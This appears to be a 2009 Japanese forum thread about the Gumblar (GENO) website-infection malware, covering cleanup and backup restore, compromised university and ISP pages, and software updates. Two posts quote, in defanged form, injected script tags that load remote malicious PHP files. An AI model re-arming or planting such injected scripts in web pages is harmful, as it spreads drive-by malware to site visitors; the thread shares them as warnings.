実際にカスペルスキーで見つかって駆除した人いないかな?

644 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:39:13 ]
>>642
NoScript使ってたなら普段のドメインとは別の見知らぬドメインがブロックされてたはず
それで大丈夫だったのかも
まあ心配ならリカバリが一番安全安心確実

645 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 03:48:40 ]
ちと疑問
新型GENOは、感染してからファイルやデータを
バックアップしても平気というか間に合うのか?

646 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 07:23:33 ]
GENOはBIOSやブートセクタや他のファイルを書き換えてくタイプでないし
リストアする際にレジストリを復元しない限り不活性化されたまんまHDDに残るんでないかい?

647 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 08:13:05 ]
>>583
おれもWindows7で同じような状態になっちゃったんだけど、それGENOウィルスじゃないかもしれない
もしかしてWindowsの方のセキュリティにあるアクセス許可、AdministratorsとかSYSTEMとかを変えたりしなかった?



648 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 16:41:38 ]
>>646
不活性化されたまんまHDDに残るを詳しく頼む

649 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 16:53:48 ]
そのまんまだよ
動かないけどファイルは残ってるってこと

650 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 18:08:37 ]
バックアップデータをリカバリしたパソコンに戻しても大丈夫だが、
もしかしたら攻撃の痕跡が残ってるファイルがあるかもなってことだ

651 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/04(水) 23:35:48 ]
でもレジストリまでそのままリストアしたらアウトってこと
レジストリ内にGENOを起動させる設定があるからね
きちんと修正したレジストリならば戻しても大丈夫じゃないかな

652 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 00:29:50 ]
レジストリをいじるプログラムなんかをその感染後にバックアップした中から
また入れなおすときには要注意ってことかなるほど

653 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 00:36:33 ]
レジストリいじるのって、簡単に言うなら例えばexe系プログラム等だもんな。
画像ファイルやテキストワードファイルや音楽ファイルなんかは
それ自体はレジストリいじるのはあまりないだろうし、
それらを動かす為のプログラムは新しくダウンしてインスコなりすれば問題なさそうだな。
詳しい人には散々既出かもしれないが、大分色々わかってきてとても有難い。

654 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 00:48:59 ]
ほんとにわかってるのかすごく心配になる文章だな
つーか何を言いたいのか1回読んだだけじゃまったく理解できん

とりあえず1行目のは実行ファイルっていえばいいんじゃね

655 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 00:58:58 ]
実行ファイルじゃなくてレジストリに設定を保存するソフトウェアのようなことを言ってるのかな
やっと解読できた

Genoの場合もそうだけどウイルスはドライバとしてロードされる部分に
埋め込まれることが多いからちょっと違う場所なんだけどね
まあレジストリは下手にいじると本当に危ないんで注意してください

656 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 10:00:18 ]
//404の中身が変わって、有害化してるらしい。
中にはLocationヘッドで違うページに転送してそこに難読化したスクリプトが置いてあるのもある。

657 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/05(木) 14:13:21 ]
>>656 のとおり、
一時期無害化されていたGumblar.xが攻撃再開。ご注意を。



658 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/07(土) 08:54:42 ]
こんなの貼られてた
Hは半角小文字、前後のスペースなし
●は.で

</head>

<script src= H ttp://christinateatern●se/images/kartachristina●jpg-for-web-small●php ></script><body>

659 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/07(土) 16:41:42 ]
Google Chormeでのweb巡回でもGENO対策になりますか・・・

横レススマソ

660 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/07(土) 17:12:22 ]
いいえ
どこが横レスなのかわからん

Google Safe Brwosingで既知の危険サイトはブロックするかもしれないけど
新型感染サイトはブロックされない可能性がある

まずは各種ソフトウェアの更新をしっかりやってください

661 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/07(土) 17:25:48 ]
ソフトウェアの更新については>>359あたり参照
今のところ直接関係はないけどJavaランタイムはVersion 6 Update 17が最新

662 名前:名無しさん@お腹いっぱい。 [2009/11/08(日) 13:15:38 ]
Javaランタイムのバージョン確認方法は

663 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/08(日) 14:00:58 ]
>>662
サイトくらい見ればいいのに
www.java.com/ja/download/installed.jsp

あと設定→コントロールパネル→Java→
基本タブにあるバージョン情報ボタンクリック

664 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/08(日) 21:01:02 ]
バージョンすら確認出来ないのにネットやってて大丈夫なのかよw

665 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 18:28:40 ]
あったりまえじゃん! ぜーんぜんへーきさ

666 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 19:30:54 ]
立命館大学の学園祭HPが感染したってマジか?

667 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 20:56:59 ]
>>666
貴方↓の中の人ですか?
ttp://www3.atword.jp/gnome/2009/11/08/warning-ritsumeikan-univ-festival-site-compromized-by-gumblar/
Gumblar.xですか。
ソースチェカー
ttp://so.7walker.net/index.php?site=http%3A%2F%2Fwww.rits-fes-by-e2.net%2F&hua=
Googleから行くと弾かれますね。

立命館大学衣笠学園祭事務局 問い合わせ
ttp://www.rits-fes.net/mail/index.html
TEL/FAX:075-465-7891

電話で教えて差し上げましたが対応が最悪です。
挙句の果てに電話を切られました。もうね、アホかとw



668 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 21:06:39 ]
うほwwwwwがっつり感染しとるwww

669 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 21:12:18 ]
>>667
今行くと404が出るからやっと対応したのかな?
でも今日の時点でアクセスカウンターが3万行ってたんだから
きちんと経緯とかを説明して欲しいね

670 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 21:39:18 ]
中の人ならいまさらマジかっていわないだろwww

671 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 21:51:07 ]
【セキュリティ】マルウェア「Gumblar」のホーム・ドメインが復活 (09/11/09)
pc11.2ch.net/test/read.cgi/pcnews/1257767416/

672 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/09(月) 23:21:36 ]
>>671
難しくてわからない
3行にまとめて下さい

673 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/10(火) 18:53:13 ]
ttp://www.google.co.jp/search?hl=ja&rlz=1R2ADBR_ja&q=%E7%AB%8B%E5%91%BD%E9%A4%A8%E5%A4%A7%E5%AD%A6BKC%E5%AD%A6%E5%9C%92%E7%A5%AD%E4%BA%8B%E5%8B%99%E5%B1%80+077-561-3990&btnG=%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq=
立命館大学BKC学園祭事務局 TEL:077-561-3990

に電話をしたところ、話の途中でFAX回線に切り替えられましたw
ピーピロピロピーってorz

[PDF] 立命館大学に於ける 情報セキュリティ対策の現状と課題
ttp://www.nii.ac.jp/csi/upki/secsem/2009/Secsem2009/seminar_04.pdf
カタカナ英語使えばいいってもんじゃないっしょww

674 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/10(火) 20:14:45 ]
関西の大学に常識的な対応を期待するなよ

675 名前:名無しさん@お腹いっぱい。 [2009/11/13(金) 16:15:20 ]
majormess.nlってのもGENOの亜種ですか?
またクロームで警告あったんですが・・

676 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/14(土) 01:32:49 ]
今回のGumblarは感染した別サイトにウイルス置いてばらまかせる仕様だし、被害者兼加害者かも?

677 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/14(土) 01:52:16 ]
そこからさらに亜種も派生してさらに蔓延すると
今回はLoveLetter以来のかなり悪質なものだね



678 名前:名無しさん@お腹いっぱい。 [2009/11/14(土) 15:17:39 ]
巻き込み規制喰らってるので携帯からorz

http://www●interq●or●jp/
Redirectにコードが仕込んであるっぽい
--
<meta http-equiv="refresh" CONTENT="0;URL=http://members●interq●or●jp/">
</head>
<script src=http://ykcv●org/upload_data/blogslideconf/hvkh●php ></script><body>
--
http://ykcv●org/upload_data/blogslideconf/hvkh●php

http://forgottenchild●in/fieldtrips/shareyourlove●php

業種的にやばすぎるというか
終わってるだろ・・・

679 名前:名無しさん@お腹いっぱい。 [2009/11/14(土) 16:56:08 ]
>>678
今ソース見てきたけど、直ってね?

680 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/14(土) 17:38:53 ]
>>678

Gumblar再来襲。interQのホームページスペース「404エラー」改ざん
ttp://blogs.yahoo.co.jp/noooo_spam/59139250.html

404も改ざんされてたらしいけど、今はどうなんだろ?

681 名前:679 [2009/11/14(土) 18:33:50 ]
ありゃ、>>678のソースが復活してら。駄目だねこりゃ。

682 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/14(土) 18:44:30 ]
Welcome to Oriental Tunes

Dear Visitor

You have requested a page or file that does not exist on the site you came from.
You can proceed to Oriental Tunes and look for that file on our site.

683 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 00:08:40 ]
ISPのシス管感染ワロス
自社オプションサービスのウィルスチェックしてみればいいのにね

684 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 01:01:02 ]
さすがは悪名高いinterQ・・・

685 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 01:24:28 ]
修正→改竄→再修正→再改竄→再々修正→再々改竄→再々再修正・・・
無限ループすんなよwww

interQ\(^o^)/オワタ

686 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 03:07:43 ]
無限ループしてる=シス管がGumblarの対処法を知らない

いくら何でも致命的すぎないか……?

687 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 06:59:43 ]
セーフ ブラウジング
interq.or.jp の診断ページ
www.google.com/safebrowsing/diagnostic?site=http://interq.or.jp&hl=ja
不正なソフトウェアは uco-squad●com/, jgreenjewelers●net/, velassin●com/ を含む 3 個のドメインでホストされています。

AS7506 (INTERQ).
www.google.com/safebrowsing/diagnostic?site=AS:7506&hl=ja

※コメントは省略す(苦笑




688 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/11/15(日) 08:11:16 ]
interqなんてDQNしか使わないよ
よって影響なし






[ 新着レスの取得/表示 (agate) ] / [ 携帯版 ]

前100 次100 最新50 [ このスレをブックマーク! 携帯に送る ] 2chのread.cgiへ
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧]( ´∀`)<157KB

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef